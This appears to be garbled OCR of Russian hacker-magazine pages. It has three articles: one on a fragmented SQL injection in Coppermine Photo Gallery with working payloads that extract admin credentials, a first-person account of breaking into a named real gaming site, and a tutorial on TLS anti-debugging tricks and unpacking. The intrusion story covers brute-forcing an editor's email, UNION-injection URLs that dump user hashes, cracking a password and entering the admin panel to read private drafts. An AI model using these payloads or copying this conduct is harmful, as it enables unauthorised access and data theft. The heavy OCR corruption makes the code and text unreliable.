защита — не использовать их в базах данных. Ну, а по-хорошему, — обно- 
вить программное обеспечение! 

В ФРАГМЕНТИРОВАННАЯ 50І_-І№ 

Теперь обратимся к такому малоизвестному виду уязвимости, как 
фрагментированная БОБ-іщ. По сути, та же самая 50Б-іщ — стой лишь 
разницей, что ее обнаружение и эксплуатация на порядоксложнее. 
Классический пример этой инъекции можно встретить, когда данные 
извлекаются из первого 50Б-запроса — и без должной фильтрации 
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подставляются во второй 50І_-запрос. То есть, налицо дефект обработки 
данных (либо полное отсутствие фильтрации данных на одной из стадий 
манипуляции ими]. Рассмотрим уязвимость на практическом примере 

для Соррегтіпе РЬоІо Ѳаііегу <= 1.4.19, 

Предварительно я опишу детали бага: 

1. В 0ЕТ,Р05Т,РЕ01)Е5Т опасные символы заменяются на Ыт [-ана- 
логи, но 1 \ 1 не затрагивается. Также они обрабатываются функцией 
зкгірзіазкез ( ) . Это дает возможность использовать N Э ЕЕ- Ьуііе. 

2. При регистрации нового пользователя для ешаіі используется ре- 
гулярное выражение, основанное на егед ( ) , который, в свою очередь, 
уязвим к N И ЕИ-Ьу^е (обработка строки при встрече с ним прекраща- 
ется]. Такчто, етаіі вида «кезк@Ыа1і. сот%00\»успешно проходит 
проверку. 

Что нам дает, если в базу данных ешаіі попадает со слешем на конце? 
Если где-либо в скрипте первый диегу получит е-шаіі и передаст 
его во второй диегу без фильтрации, то слеш заэкранируетзакрываю- 
щую кавычку, синтаксис запроса нарушится и возникетЭОЕ-Еггог. 

ЗОЬ-еггог : 

ІЫЗЕКТ ШТО срд1418_есагсІз ( зепс!ег_пате , зепс!ег_етаі1 , 
гесіріепк_пате , гесіріепк_етаі1 , Ііпк, сіаке, зепсІег_ 
ір) ѴАЫІЕЗ ('123' , ' кезкФЫаЬ. . сот\ ' , ' ЗотеІІзегЫате ' , 

' ЗошеІІзег© ешаіі . сот ' , ' БОпкгСф ІбІЫГиІз кгОз к 1 , 1 ' , 
'127.0.0.1' ) 

Ошибка, кактаковая, бесполезна, но если сразу после параметра етаіі 
будет идти еще один параметр, который мы можем произвольно менять, 
то становится возможным проведение фрагментированной 50Е- 
іщесбоп. 

ЗОЬ-іп] тогеігото: 

ШЗЕКТ ШТО срд1418_есагс!з ( зепсіег_паше , зепс!ег_ 
ешаіі, гесіріепк_паше , гесіріепЦ_етаі1 , Ііпк, 
сіаке, зепсІег_ір) ѴАЫІЕЗ ('123', ' кезкѲЫак . сот\ ' , 

' [ЗСЩ-іп^еск тогеігсж] ' , ' ЗотеІІзег@етаі1 . сот ' , 

' БОпкгОз ІбІпЦиІзк20зк ' , ' ', '127.0.0.1') 

Как видно, открывающаяся кавычка поля гесіріепк_пате превра- 
щается в закрывающуюся кавычку зепсІег_етаі1. Мы получаем шанс 
провести ЭОЕ-іщ в поле гесіріепк_пате. 

Для эксплуатации уязвимости потребуется: 



1. возможность регистрации новых пользователей; 

2. отсутствие подтверждения регистрации через ешаіі; 

3. возможность лога открыток. 

Алгоритм действий при соблюдении трехусловий очень прост: 

1. Отснифать Р05Т-пакет регистрации, заменить в нем етаіі на «кезк@ 
ЫаЬ . сот%00 \» и отослать серверу. 

2. Авторизовавшись, выбратьлюбоезагруженное изображение в гале- 
рее и нажать на значок письма (отправить этот файл какоткрытку]. 

3. Корректно заполнить все поля и отослать. Если сервер сообщает об 
ошибке базы данных, значит, логоткрытоквключен и возможна 50Е-іщ. 

4. В поле «Имя получателя» проводим ЗОЕ-тогеІ гоѵѵ, используя автома- 
тизированный скрипт. 

РАЬЗЕ — "Имя получателя" : 

ог ік (азсіі (зиЪзкгіпд ( (зеіеск сопсак (изег_ 
ісі, 0x3 а ,изег_паше , 0x3 а , изег_раззѵ\гогсІ, 0х3а,изег_ 
ешаіі) кгош срд14х_изегз ѵтЬеге изег_дгоир=1 Іішік 
1) ,1,1) ) =2 54,1, ( зеіеск 1 ипіоп зеіеск 2 ) ) =1 , 

0x686163 бЬб 5 72 , 0x686163 6Ь6572 4 0 6(36169 6с2е72 7 5 , 
0x686163 6Ь , 0x31323039333931343430 , 0x323 0372е343 62еЗ 
233322е313832 ) /* 

ТІШЕ — "Имя получателя" : 

ог ік (азсіі ( зиЬзкгіпд ( ( зеіеск сопсак (изег_ 
ісі, 0х3а,изег_паше, 0x3 а , изег_раззѵ\гогс1, 0х3а,изег_ 
ешаіі) кгош срд14х_изегз хУЬеге изег_дгоир=1 Іішік 
1) ,1,1) )=49,1, ( зеіеск 1 ипіоп зеіеск 2 ) ) =1 , 

0x686163 6Ь6 5 72 , 0x686163 6Ь6572 4 0 6(16169 6с2е72 7 5 , 
0x686163 6Ь , 0x31323039333931343430 , 0х3230372е34362е3 
233322е313832 )/* 

Из-за фильтрации '<' '>' можно использовать только знак ' = ' . Но 
это уже, какговорится, мелочи и делотехники. Необходима надежная 
фильтрация данных, заносимых в БД, либо дополнительная проверка 
при извлечении. 

В КАЖДОМУ ПО ПОТРЕБНОСТЯМ 

При написании сей статьи я не хотел кого-то обидеть. Вроде все учел: 
хакерам дал баги, админам — патчи. Надеюсь, читатель, ты узнал для 
себя что-то новое и нежалеешь о потраченном времени. Еслитак.томы 
еще не раз встретимся стобой на полосе журнала. Удачи! ~в~ 




Это не в.іше воображение,.,. 



ТВ-тюнеры 



денег и места! 



№Жк: і:п|Д да*ЕТ=т,' л у; ДТі 

РИ шліша м Еч.^у ПК мпи нотт^чд 

■ С-еіГгфр-ирсс^ігч^іі МскфзЛ шу м а датдіідочіога 
цтк^а _ -;'ѴИ длр С4трч4УГѴ и і-Ушіс-і 

■ МсвдоП МРЕ.-53: 
гчщнрквддет грящп- нвдоа і 

ІЛѴгкжп. ГЛ*м!іл к>м>і 

■ ііі ІРН ѴѴіііІі-аъ Ѵліі іП-' іі'.Н. 



ч-Г^иоійір- і>і 

лг^і-.углуд і-г.п-і'тг* 

и ТЦК-ЮМИ »ЬИ Г ЮТ 

^ Ім^ га Кф«пнь-* 

і вдшшчр-вдоѵ 4 пг ■ и> 

•■Г Ги допрдол- 



п СОМРЙО 

Г К Н ІО й т 



гіщн і Г АЦиЗДца* 

Нкшя ОПгікЁІ-ИН 
»-■■■• ік іыс. 

№ 

***11ьяш** 



тш .ы припаи ТЙ- Івінир и йпа 




#уш #и« нэ-*ы 

і— *=чЧі?. пи тх 

■ягНІ-Ч 'НИ Н>"1! 

-ьі-т -«и 
п. і і"'^: 

гшіаігпм 

Ш .НІ . -ЧИІІ НШП 
МшІ'я Н.|Кя Г пц чс. ■'іг- 



янчіап ЧКІ, ГІЧ ІП 
ІИІІМ 

иі-.і шли** 

-. Л -чФл «. ■ - 47 . 

Ипасі :н ■ . эі і жіа 



-•■■НІ ■.іЛіч'чЧ 

в л ■! Ч НІ ■' ■: 



«Мч- ліД-ЧПЛ 






Искал я одним фору- 
мом. Там человек по имени Крис на его сер- 

вере есть почти готовая статья о релі^^^^^^^^^^^^^^побимой игры. 
Но статья выйдет в свет только вместе с ре^^^^^^^ольку релиз намечал- 
ся не очень скоро, я не удержался и попробовал сам взглянуть на эту «сек- 
ретную информацию». 



тобы проучить товарища Криса Лейтона за неумеренное 
хвастовство, сначала я должен был найти его сервер. Я 
просмотрел профайл Криса на том же форуме, но никаких 
ссылок на другие ресурсы там не было. «Плохо, — подумал я, 
— но не смертельно, поскольку есть еще такой злобный хакерский поис- 
ковик, какбоодіе». Набрал в поиске «Крис Лейтон» и, как и рассчитывал, 
увидел на первой же странице вполне вероятное хранилище исходников 
заметки — плюсе-таіі Криса, который хранился на дтаіі.сот . 

Такя попал я на достаточно солидный и крупный ресурс [ ѵѵѵѵѵѵ. 

Іоіа Іѵібеода тез. сот ), посвященный новостям мира игр. Сайт, судя 
по контактам, — британский; контент полностью на английском 



языке. Просматривая размещенные новости, я сразу просек, что 
Крис — один из множества редакторов этого проекта (новостей там 
было очень много, и авторов тоже немало]. Ничего подозрительно- 
го не увидев, я решил пойти спать, так как время было позднее. Но 
тут мне пришла в голову неплохая мысль — поставить брут на ночь 
на то самое мыло, которое я увидел в Гугле. Брут решил делать по 
словарю английских слов, та к как сайт британский. Мало ли, вдруг 
тут будет тот распространенный случай, что у юзера один и тот же 
паролькакнае-мейле.таки на всех сайтах, где он зарегистриро- 
ван. «Пусть ночь пройдет не впустую, а с пользой», — подумал я и 
пошел спать. 
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Н УТРОМ Я ПОЗНАКОМИЛСЯ СЖЕРТВОЙ 

Я торопливо подбежал к компьютеру и включил монитор. Ксожалению, 
меняждало разочарование. Ночной брутничего недал, и я решил его ос- 
тановить. Значит, не все так просто — нотем интереснее! Ладно, подумал 
я, придется потратить время и самому проанализировать сайт на уязви- 
мости. Осмотревшись, я решил, что это какой-то самописный движок, 
мне незнакомый. Поэтому поиск багов на других ресурсах под какую-либо 
версию я сразу отверг. Тоска, все придется проверять самому! 

Оказалось, что ѵѵѵѵѵѵТоІаІѵісІеодаппез.сопп — весьма популярный и массо- 
вый забугорный портал с весьма оригинальным и красивым дизайном 
о новинках в игровой индустрии. Количество посещений его в сутки 
составляет около 25-30 тысяч уников. 

Первая мысль, которая меня посетила, былатакой: поскольку сайточень 
посещаемый, а, значит, свежеобновляемый, то есть неплохие шансы, 
что мой друг Крис появляется там очень часто. Начать можно было бы 
с поиска Х55 (), — уязвимости, которая позволила бы мне получить на 
снифер соокіе администратора. Но для этого мне надо было зарегистри- 
роваться и заставить его перейти по нужной мне заранее заготовленной 
ссылке. Пожалуй, оставим этот вариант на потом, подумал я. Времени 
он могзанять много и не давал гарантий результата, по сравнению с 
другими, оставшимися у меня в запасе, идеями. 

Н БИТВА ИДЕЙ 

Пролистав пару страниц и заметив переменные в ссылке, думаю: сяду- 
ка я проверить этот сайтна наличие Эці-инъекций. А вдруг? Хотя если 
честно, не особо верил — процедура пусть и привычная, но не часто себя 
оправдывает. 

Потратив не один десяток минут на проверку, я не поверил увиденному! 
Бог мой, неужели здесь, на этом серьезном портале, естьЗцІ-инъекция? 



Да-да, горе-кодеры что-то упустили! А ведь это весьма полезная для 
хакера уязвимость, лучше и быть не может! Не буду грузить тебя проме- 
жуточными вычислениями, скажулишь, что инъектбыл вида: 

ЪДЦр : / /шт. СоСаІѵісІеодатез . сот/радез/агСісІез/іпсІех. 
р]гр?агЦіс1е_іс1=67777 1 

Я переделал запрос под себя, подбирая количество столбцов. Эх, 
нелегкое это дело, особенно если делать вручную — кто знает, сколько 
их окажется! Разумеется, существует ОПОЕН ВУ и ОРОІІР ВУдля более 
быстрого подбора, но я привык проверять все ручками (мне так больше 
нравится]. И в от результат о правда л мои старания: 25 столбцов! В случае 
правильного подбора исчезнетошибка и выведется обычая рабочая 
страница: 

ЪДЦр : / /тш. СоСаІѵісІеодатез . сот/радез/агСісІез/іпсІех . 
р]гр?агРіс1е_ісІ=67777 ' +ипіоп+зе1есС + 1 ,2, 3,4,5, 6,7, 8, 9,1 
0,11,12,13 ,14, 15, 16, 17, 18, 19, 2 0, 2 1,22, 23, 24,2 5%23 

Подобрав количество столбцов, посмотрим, какие из них отобрази- 
лись на странице. Например, «2». Убедившись, что «2» умеет выво- 
дить информацию, подставляем теперь вместо «2» в нашем запросе: 
сопса1:_\л/5(сЬа г(58] , изегпа те, раззѵѵогсі ,ета і I, ісц] . Это вывод через 
поле «2» с разделением двоеточием (сопса1:_\л/5(сЬа г(58]] выводимых 
параметров (изегпа те, разэѵѵогсі .етаіі.ісц]. Прежде, разумеется, 
не за будь убедиться, что существует та блица, именуемая именно 
ІІзегз, и что поля в ней именуются изегпате, раззѵѵогсі, етаіі и ісц (а 
не, к примеру, тетЬегпате, раззѵѵсі или т.п.). Все это мне пришлось 
подобрать: 
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ІЩЦр : / /ѵпш. СоСаІѵісІеодатез . сош/радез/ 
агСіс1ез/іпс1ех.р]ір?агЦіс1е_іс1=67777 ' +ипі 
оп+зеІесС+1 , сопсаС_мз (сЬаг (58) ,изегпате, 
раззѵгогсі, етаіі , ісд) ,3,4,5,6,7,8,9,10,11, 
12,13,14,15,16,17,18,19,20,21,22,23,24, 
25+1гош+изегз%23 



> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 



Ну вот, теперь перед нами на экране ник, хеш пароля 
и е-мейл первого пользователя. Ну и I СО, если есть, 
выведется. У этого пользователя аськи нет, поэтому она не 
выводится. 

Мне осталось расшифровать пароль, поскольку зашиф- 
рован он был, какэто часто бывает, в формате тсІ5. Сел я 
перебирать знакомые мне сервисы по расшифровке тб5. 
На примете у меня их было порядка 4-5 весьма крупных. 

К моему удивлению, ни на каком из этих сервисов пароля 



не было. Ладно, тогда спросим у людей, которые посто- 
янно их брутят — я решил перебрать форумы хакеров в 
рунете. Запостив на одном из них просьбу расшифровать 
хеш, примерно через два часа я увидел пароль Криса. 

В ТРЮКС ПОИСКОМ АДМИНКИ 

Ну а теперь оставалось вроде бы самое простое — найти 
админку, зайти в нее и посмотретьсписокчерновыхзаметок 
моего друга Криса. Начал я искать админку. Потратив пять 
минут и перебрав все основные банальные варианты 
админок, понял, что вручную я ее, скорее всего, не подберу. 
Начал думать, как бы еще я мог получить какую-то инфор- 
мацию о содержимом сайта. И тут мне в голову пришла 
отличная идея, которая иногда оченьдаже полезна! Из 
своего опыта работы в интернете по развитию и продви- 
жению сайтов я знал, что многие админы кладут в корень 
сайта файликгоЬоІз.М (с настройками и указаниями для 
поисковых ботов, что индексировать, а что — нет, и прочими 
тонкостями]. Грубо говоря, все директории, куда не следует 
заглядывать боту, без проблем можно указать в этом файле 
после специальных ключевых слов. Вот я и поспешил 
проверить, есть ли там этотфайлик. Мне повезло, потому 
что админы этого крупного солидного проекта как раз в нем 
и указали адрес кадминке. Добавлю, что вручную я бы и за 
неделю не подобрал эту входную часть ссылки (Дѵдасітіп). 
Вот как раз то, что мне нужно, подумал я. И хорошо, что не 
стал терять время на поискХЗЗ! Зачем нести затраты, если в 
этом нет необходимости? 

В В АДМИНКЕ 

Попав в админку, я осмотрелся и убедился, что мои 
первоначальные догадки о том, что над этим проектом 
трудится большое количество редакторов — оказа- 
лись верными. А Крис Лейтон — самый главный изних, 
поскольку может назначать и убирать редакторов через 
админку. Неподалеку я нашел раздел с черновиками, в 
котором находилосьто, ради чего и была вся кутерьма! 

Что ж, уязвимость можно попытаться найти в любом 
популярном продукте. Сотни тестеров проверят каждый 
кусочек кода, но никто и ничто не гарантирует полной 
защищенности! Ура, товарищи! НЕ 
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ЛЯУ\\-Р\ЫЕ 



представляет оп-Ііпе игру 





Многочисленные призы 
от АІріпе 



Махі Касіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Касіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Мебіа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХІ КАСІІЧС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и \л/ѵѵ\л/.тахі-1:ипіпд.ги 



РОСНО 



в составе АІІіапг (Ш) 



тзп 




» 



взлом 





^ЭНЦИКЛОПЕДИЯ 
АНТИ О ТЛАДОЧНЫХ 
'ПРИЕМОВ п 



ИСЧЕРПЫВАЮЩЕЕ РУКОВОДСТВО ПО ПРИГОТОВЛЕНИЮ И ВЗЛОМУ П5 



Загадочная аббревиатура ТЬЗ таит в себе много секретов. Это — мощнейшее 
оружие против отладчиков и дизассемблеров. В комбинации с упаковщика- 
ми ТЬ5 превращается в гремучую смесь термоядерного типа. 



то же такое ТЬБ и чем оно грозит хакерам? Начнем изда- 
лека. Популярныеязыки программирования (втом числе, 

Си] поддерживают статические и глобальные переменные, 
использование которых делает код потоконебезопасным. Все 
потоки разделяют один и тотже набор глобальных/статических переменных, 
порождая путаницу и хаос. Пото к «А» положил в переменную іоо значение «X» 
и только хотел прочитать его обратно, как внезапно пробудившийся поток«В» 
записал в іоозначение «У», что оказалосьдля «А» полной неожиданностью. 
Мі егозой разработали специальный механизм, именуемый Ло- 
кальной Памятью Потока (ТЬгеаб І_оса15іогаде или, сокращенно, 



ИЗ), предоставляющий в распоряжение потоков индивидуальные 
наборы глобальных/статических переменных. ИЗ поддерживается 
как на уровне явно вызываемых АРІ -функций (тъзаііос, ТЬЗРгее, 
ТЬЗЗеСѴаІие, ТЬЗОеСѴаІие] так и на уровне РЕ-формата, неявно 
обрабатываемого системным загрузчиком. РЕ-формат поддерживает 
функции обратного вызова (ТЕЗ-саНЬаск), автоматически вызывае- 
мые системой до передачи управления на точку входа. В частности, 
это позволяет определить наличие отладчика или скрытно выпол- 
нить некоторые действия. Системный загрузчик, также, записы- 
вает ИЗ- индекс в заданную локацию — отличный способ неявной 
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самомодификации программы. Дизассемблерами она 
не отлавливается и заводит хакера в тупик. 

ИЗ используется в большом количестве протекторов, 
защит, вирусов, сгаскте и прочих программ, взлом которых 
описан в куче различныхтуторалов. Однако изложение 
обычно носит поверхностный характер — целостной 
картины после прочтение не создается. Попробуем это 
исправить. 

Н РІЖОАМЕМТАІ-5 

Прежде всего, нам понадобится спецификация РЕ-форма- 
та, последнюю версию которого (представленную в виде 
ХМІ_) можно утянуть прямо из-под носа МісгозоК. Тот же 
самый файл, только конвертированный в М3 ѴѴогсІ 2000, я 
выложил на своем сервере. 

ТІ_5-таблица описывается девятым (считая от нуля] 
четвертным словом в ОрЕопаІ Неабег Оаіа Оігесіюгіез. 
Первое двойное слово хранит в себе РѴА-адрес ТІ_5- 
таблицы. Второе — ее размер, который игнорируется 
всеми известными мне операционными системами. 
Поэтому здесь можно писать все что угодно, хоть 0, хоть 
ееееееееЬ. Дизассемблерам это крышу не срывает, 
во всяком случае — ЮА-Рго, 0 Ну и даже примитивный 
ОиМРВІЫ работают какни вчем неб ы вал о. А вот про вер- 
ка валидности размера ИЗ -та блицы может появиться в 
любой момент, так что лучше не прикалываться и писать 
то, что нужно. 

ЛЗ-та блица может находиться в любой секции с атрибу- 
тами ІМАОЕ_5СЫ_СЫТ_ІЫІТІАЫ2ЕВ_РАТА | ІМА0Е_ 
ЗСЫ_МЕМ_ЕЕАЕ | ІМА0Е_5СЫ_МЕМ_ШІТЕ (например, В 
секции данных]. 

Некоторые линкеры помещаютТІ_5-таблицу в специаль- 
ную секцию . тьз или . тъз$ — это делается из чисто 
эстетических соображений. Системный загрузчик не 
проверяет имя секции. Правда, некоторые упаковщики не 
обрабатываютТІ_5, расположенные вне секции .ТЕЗ, но это 
уже ихличные проблемы. Тем более, ряд упаковщиков, что 
такое ТИЗ, не знает вообще. 

Функции обратного вызова вызываются системным 
загрузчиком при инициализации/терминации процесса, а 
также при создании/завершении потока. Они имеюттотже 
самый прототип, что и ЕІІМаіп: 



ПРОТОТИП ФУНКЦИЙ ОБРАТНОГО ВЫЗОВА 

СуресіеТ ѴОІБ (ШАРІ *РІМАСЕ_ТЬЗ_САЬЕВАСК) ( 
РѴОІБ БІІНапсІІе, // дескриптор модуля 

ШОШЭ Реазоп, // причина вызова 

РѴОІБ Кезегѵесі) ; // зарезервировано 




Возможные значения параметра Реазоп 



Двойное слово Реазоп, информируя функцию обратного 
вызова, по какой причине она была вызвана, принимает 
следующие значения — смотри скриншот сверху. 

С функциями обратного вызова все понятно. Системный 
загрузчик просто вызывает их одну за другой, игнорируя 
возвращаемые значения и даже не требуя очистки аргу- 
ментов из стека — красота! 

А вот с ТИЗ-индексом все чуть-чуть сложнее. Двойное сло- 
во по адресу ЕЗ: [ 2 СЬ. ] указывает на ЛБ-массив, содер- 
жащий данные локальной памяти потока для всех моду- 
лей. Чтобы не возникало путаницы, системный загрузчик 
при инициации модуля записывает по адресу Аббгезз оі 
Іпбех индекс данного модуля. То есть, локальная память 
потока находится по адресу: ЕЗ : [2СЬ] [іпсІех*4]. 
Теоретически, іпбех может принимать любые значения, 
известные только одной операционной системе, но прак- 
тически — он равен нулю для первого модуля и увеличи- 
вается на единицу для всех последующих. Если наш файл 
не загружает никаких ОДЕ,, использующих Л5, индекс 
будет равен нулю (с высокой степенью вероятности, но 
без всяких гарантий]. Какже его можно использовать на 
практике? Самое надежное — записать в секцию данных 
число типа 1234567 8Ь. и натравить на него индекс. После 
инициализации приложения мы получим что-то «отлич- 
ное от» — и дизассемблеры это не засекут! 

Теоретическую часть будет считать законченной, присту- 
пим к практическим занятиям. 

Н РУЧНОЕ СОЗДАНИЕ ТІ_5 

Для работы с ИЗ нам необходим компилятор и линкер, 
поддерживающий обозначенную технологию. Недо- 
статка в таковых нет, хотя нет и полноценной подде- 
ржки ИЗ. Возможно, мы захотим прикрутить ИЗ к уже 
упакованной/запротекченной программе, следова- 
тельно, нам жизненно необходимо научиться созда- 
вать его руками. В случае ЕХЕ с убитыми фиксами это 
очень просто. С 0^ уже будет сложнее, так как придет- 
ся править табл ицу перемещаемых элементов. Туттоже 
есть свои хитрости и трюки... но сначала — ЕХЕ. 

Пишем простую программу типа «Ьеііо , тоогісі ! ». 
Компилируем ее и открываем полученный файл в НІЕѴѴ’е. 
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Исключения, воз- 
никающие внутри 
ТІ_5-саІІЬаск’ов, 
давятся системой 
на автомате. Но 
зато отлавливаются 
отладчиками (той же 
Ольгой]. При этом ха- 
кер не понимает, как 
это может работать. 
Что тут думать — надо 
жать <5ЫЙ-Е9> для 
передачи управле- 
ния на точку входа! 



Идем в начало секции . ОаДа (по <ЕІ\ІТЕВ> переходим 
в Ьех-режим, <Е8> — для вызова РЕ-заголовка, <Е6> 

— ОЬіесіТаЫе, подводим курсор к .ОаСа и жмем 
<ЕІ\ІТЕР>). Пропускаем инициализированные данные, 
подгоняя курсор кадресу . 4061001т (в другом случае ад- 
рес может быть иным), где и пишем следующую магичес- 
кую последовательность: «10 61 40 00 I 20 61 40 00 




1 30 61 40 00 1 60 61 40 00». Ладно, на самом деле 
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означает на чал о/конец блока данных локальной памяти 
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потока, который может находиться в любой области памя- 
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ти, доступной на чтение. Третье двойное слово — адрес 
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двойного слова, куда загрузчикзапишетТЕЗ-индекс. В 
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нашем случае это — 0040613 0й, где мыв НІЕѴѴ’е ставим 
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6666666 6й (чтобы убедиться, что загрузчик действитель- 
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но перезаписывает это значение). Последнее двойное 
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слово — указатель на таблицу функций обратного вызова, 
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расположенную по адресу 0040616 0й и содержащую ука- 
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затель на единственный саІІЬаск по адресу 0 04 0 619 01т, 
за которым следует ноль (указывающий, что других 
саЕЬаск’ов здесь нет и не предвидится]. 

Что же касается самого саШэаск’а.то, подогнав курсор к 
адресу 004061901т, легким нажатием ЕЫТЕР’а мы переходим 
в режим ассемблера. Атутпишем: «БЕС в, [00406140]», 
<ЕІ\ІТЕР>, «ПЕТ». После чего сохраняем изменения по <Е9> и 
выходим, предварительно полюбовавшись на результат на- 
шей работы (см. листинг 2]. Ну, а кому лень возиться с НІЕѴѴ’ом, 
может воспользоваться готовым файлом йеііо-тьз . ехе 
— он есть на диске журнала и выложен на моем сервере. 

ТІ_5 Р СОЗДАННЫЙ ВРУЧНУЮ (НЕХ-ДАМП) 

.00406100: 10 61 40 00-20 61 40 00-30 61 40 00- 

60 61 40 00 >а@ а@ 0а@ 'а@ 

.00406110: 00 00 00 00-00 00 00 00-00 00 00 00- 

00 00 00 00 

.00406120: 00 00 00 00-00 00 00 00-00 00 00 00- 

00 00 00 00 

.00406130: 66 66 66 66-00 00 00 00-00 00 00 00- 

00 00 00 00 

.00406140: 00 00 00 00-00 00 00 00-00 00 00 00- 



Дурим антивирусы 

Секреты ТЪ5 на этом не заканчиваются. Они способны на такие трюки, что 
просто дух захватывает. Некоторые вирусы внедряются исключительно путем 
модифицирования всего 4х байт — указателя на ТЪ5-таблицу, расположенную в 
памяти (в одной из системных БИ), где находится указатель на команду переда- 
чи управления на зйеіі-код. 

Конечно, подобная техника внедрения работает только на той версии опера- 
ционной системы, под которую она заточена, но антивирусы таких вирусов не 
обнаруживают. Или, вообще, не обращают внимания на изменение сіігесгогу 
гаЫе. 



Остается только занести ИЗ в таблицу директорий. В 
НІЕѴѴ’е это делается так: открываем файл, переходим в 
Ьех-режим, давим <Е8> для вызова РЕ-заголовка, а следом 
— <Е10> для вызова директории таблиц. Подгоняем курсор 
кИБ и редактируем его по <ЕЗ>, вводя РѴА-адрес начала 
ТЬЗ-таблицы (в нашем случае — 610 ОЬ.) и размер (можно 
братьлюбой]. 

Н БОЕВОЕ КРЕЩЕНИЕ 

Загружаем йеііо-тьз . ехе в отладчик (например, в 
Ольгу] и ходим по адресу 00406100Й. Мы четко видим, что 
двойное слово 66666666Й поадресу 00406130Й мисти- 
ческим образом обратилосьв ноль, зато нулевое двойное 
слово по адресу 004 0614 Ой, уменьшившись на единицу, 
превратилось в ррррррррй — результат за пи си индекса и 
вызова саШэаск’а, соответственно. Это произошло до того, 
как мы успели выполнить хотя бы одну команду, стоя в точке 
входа. 

^ КАК ЭТО ЛОМАЮТ 

Существует множество ріид-іп’ов для Ольги, автоматически 
стопящихся в началеИЗ. Но, во-первых, большинство из 
них неумеютобрабатывать более одного саІІЬаск’а, а во- 
вторых, мы — хакеры — должны все делать своими руками. 
Короче, зовем на помощь НІЕѴѴ. Открываем файл и по <Е10> 
зовем директориютаблиц, какуже описывалось выше. 
Видим там ИЗ и что РѴА-адрес не равен нулю. Ага! Значит, 
тут есть ИЗ! Подгоняем курсор к строке «ИЗ» и переносим- 
ся туда по ЕЫТЕР’у. Четвертое (считая от одного) двойное 
слово — указатель на таблицу функций обратного вызова. 
Смотрим, чтоу насздесь. Аздесьу нас 00406190Й. Перехо- 
дим по обозначенному адресу и жмем <ЕІ\ІТЕП>, переключая 
НІЕѴѴ в режим дизассемблера. Изучаем саІІЬаск, попутно 
запоминая его адрес. Он нам понадобится чуть позже. 

Мы снова в Ольге. И снова ТІ_5-саІІЬаск отработал еще 
до завершения загрузки файла в отладчик. Но сейчас-то 
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ФорматТ[_5-таблицы для РЕ32/РЕ32+ файлов 



мы знаем его адрес! Давим <СТРЕ-0>, вводим «004 061901л» (адрес 
саІІЬаск’а) и устанавливаем аппаратную точку на исполнение. Теперь 
перезапускаем отладчикпо <СТРЕ-Е2>. На этот раз Ольга останавлива- 
ется в начале функции обратного вызова (см. рисунок]. Трассируя ее, мы 
доходим до РЕТ, попадая в недра ытоьь . вьь, но <Е9> выносит нас в 
точку входа (а если не выносит — ставим туда бряк]. 

Аналогичным образом работают и другие отладчики (в частности, 5оЬ-Ісе]. 
ЮА-Рго автоматически отображаетТЕО-саЕЬаск’и в списке точек 
входа (<СТРЕ-Е>), а также дешифруетТЬЗ-таблицу в удобной форме. 
Так что, на сложности взлома жаловаться не приходится. Главное, 
помнить о ТЮ-индексе и отом, что он может использоваться для 
самомодификации. 

ТІ-5-ТАБЛИЦА ДЕКОДИРОВАНИЯ ША-РВО 

. сіака : 00406100 ТЬЗБігескогу 
ТЬЗЗігеОТгегоРіІІ 
.сіаСа: 00406104 ТЬЗЕпсі_ркг 
. Ьака : 00406108 ТЪЗІпс1ех_ркг 
ТЬЗІпсІех 

. сіака : 0040610С ТЪЗСа11Ьаскз_ркг 
ТЬЗСаІІЬаскз 

. сіака : 00406110 ТЬЗЗІ2еОТ2егоРі11 
. сіака : 00406114 ТЬЗСЬагаскегізкісз 

Н ВЦСКМЕ-СРАСКМЕ — РЕАЛЬНЫЙ ХАРДКОР 

Разобравшись с основами ИЗ, попробуем заломать Ьискте-сгаскте. 
Зал о мать, в смысле, распаковать, а упакован он II РХ’ом, что лег- 
ко определить как с помощью РЕЮ/РЕ-ТОО Б5, так и визуальным 
просмотром файла в НІЕѴѴ’е — по названиям секций ІІРХО, ІІРХ1 , 

ЬРХ2. Запускаем упакованный файл на выполнение и видим ухмы- 
ляющуюся рожицу в диалоговом окне. Берем ЬРХипишем «$ирх -Ь 
Ьиск-ше . ехе»... Получаем: «ирх : Ьиск-ше.ехе: ІОЕхсеркіоп: 
Ьиск-ше . ехе : Регшіззіоп Ьепі ей» — как это так? С какого вдруг 
перепугу доступ отвергнут? Атрибута Реаб-Опіу у файла нет. Правда, на 
запись в файл у нас атрибуты были. Атеперь нет. Куда же они подева- 
лись? Все просто. После нажатия на «ОК» программа не завершилась, 
и процесс продолжил болтаться в памяти. А, как известно, доступ к 
запущенным файлам заботливо блокируется системой. 

Лезем в «Диспетчер Задач» (или в РАР] и сносим процесс «Ьиск- 
ше . ехе» к чертовой матери, после чего пробуем повторить операцию. 

На этот раз распаковка проходитуспешно, но при запуске распакованно- 
го файла он матерится так, что на это лучше не смотреть. 

Короче, накрылась наша распаковка медным тазом. Поведение рас- 
пакованной программы радикально изменилось. Значит, где-то есть 
проверка на наличиеупаковщика. Чтобы понять, где, смотрим распако- 
ванный код, который предельно прост. 

РАСПАКОВАННЫЙ КОД ВОСКМЕ-СВАСКМЕ 

.00401000: 8В442404 шоѵ еах, [езр] [04] 

.00401004: 8В1500304000 шоѵ есіх, [00403000] 



Списокфункций обратного вызова, отображаемый ЮА-Рго 



0040100А: 


6А00 


ризЬ 


000 


0040100С : 


6800304000 


ризЬ 


000403000 


' Ьиск 1 








00401011: 


ЗЗБО 


хог 


есіх, еах 


00401013 : 


6800304000 


ризЬ 


000403000 


' Ьиск ' 








00401018: 


6А00 


ризЬ 


000 


004 010 ІА: 


891500304000 


шоѵ 


[00403000] , есіх 


00401020: 


ЕЕ15082 04000 


саіі 


МеззадеВохА 


113ЕК32 








00401026: 


6А00 


ризЬ 


000 


00401028: 


ЕЕІ5002 04000 


саіі 


